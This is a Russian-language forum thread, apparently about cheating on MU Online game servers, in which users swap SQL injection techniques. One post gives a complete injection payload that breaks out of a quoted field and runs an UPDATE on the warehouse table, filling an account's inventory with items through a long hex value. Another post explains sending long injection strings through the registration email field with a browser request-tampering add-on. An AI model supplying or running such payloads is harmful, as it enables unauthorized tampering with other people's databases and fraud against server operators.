avatar_Everybody

SQL инжект - что это за атака?

Автор Everybody, 2007 Нояб. 22, 11:54

« назад - далее »

0 Пользователи и 2 гостей просматривают эту тему.

Everybody

Цитата: Jackal от 2009 Март 17, 00:27  Может ктота помочь ?????? У меня такой вопрос...
' update warehouse SET Items = 0x______а дальше что надо писать ???????? WHERE AccountID = 'ACCOUNT'

заранее спс...

Например sql inject на полный инвентар box +5 (старые версии серверов)
' UPDATE warehouse Set items=0xCB64FF00000000C004DDCB64FF00000000C004DDCB64FF00000000C004DDCB64FF000000
00C004DDCB64FF00000000C004DDCB64FF00000000C004DDCB64FF00000000C004DDCB64FF0000000
0C004DDCB64FF00000000C004DDCB64FF00000000C004DDCB64FF00000000C004DDCB64FF00000000
C004DDCB64FF00000000C004DDCB64FF00000000C004DDCB64FF00000000C004DDCB64FF00000000C
004DDCB64FF00000000C004DDCB64FF00000000C004DDCB64FF00000000C004DDCB64FF00000000C0
04DDCB64FF00000000C004DDCB64FF00000000C004DDCB64FF00000000C004DDCB64FF00000000C00
4DDCB64FF00000000C004DDCB64FF00000000C004DDCB64FF00000000C004DDCB64FF00000000C004
DDCB64FF00000000C004DDCB64FF00000000C004DDCB64FF00000000C004DDCB64FF00000000C004D
DCB64FF00000000C004DDCB64FF00000000C004DDCB64FF00000000C004DDCB64FF00000000C004DD
CB64FF00000000C004DDCB64FF00000000C004DDCB64FF00000000C004DDCB64FF00000000C004DDC
B64FF00000000C004DDCB64FF00000000C004DDCB64FF00000000C004DDCB64FF00000000C004DDCB
64FF00000000C004DDCB64FF00000000C004DDCB64FF00000000C004DDCB64FF00000000C004DDCB6
4FF00000000C004DDCB64FF00000000C004DDCB64FF00000000C004DDCB64FF00000000C004DDCB64
FF00000000C004DDCB64FF00000000C004DDCB64FF00000000C004DDCB64FF00000000C004DDFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF WHERE (accountid = 'ACCOUNT')--

Jackal

ЦитироватьНапример sql inject на полный инвентар box +5 (старые версии серверов)
а для новых версиях есть ?

Platinum

Это видео нужно перезалить снова... ссылы погибли........



Jackal

https://files.filefront.com/MuToolzzip/;498...;/fileinfo.html

Находишь название шмотки и изменяешь спид. (макс  255)

Цитироватьhttps://files.filefront.com/MuToolzzip/;498...;/fileinfo.html

Находишь название шмотки и изменяешь спид. (макс 255)

Извените не туда :D

Kavabanga

Спойлер
не вижу видео, можна както перезалеть ево
[свернуть]

SadisT

#65
Люди если помнит кто то, тут была подобная тема  и в ней была ссылка на видео и "Date Tamler" или типо того ( он нужен был для перехватки данных и внедрение в них SQL inject" мог бы кто нибудь скинуть ссылку на этот "Date Tamler"



Всё нашел !! если комуто нада _https://addons.mozilla.org/en-US/firefox/addon/966   она нужна для того чтобы вписывать огромные команды sql inject так как в строку email при регистрации не поместица и часть команды

Похожие темы (5)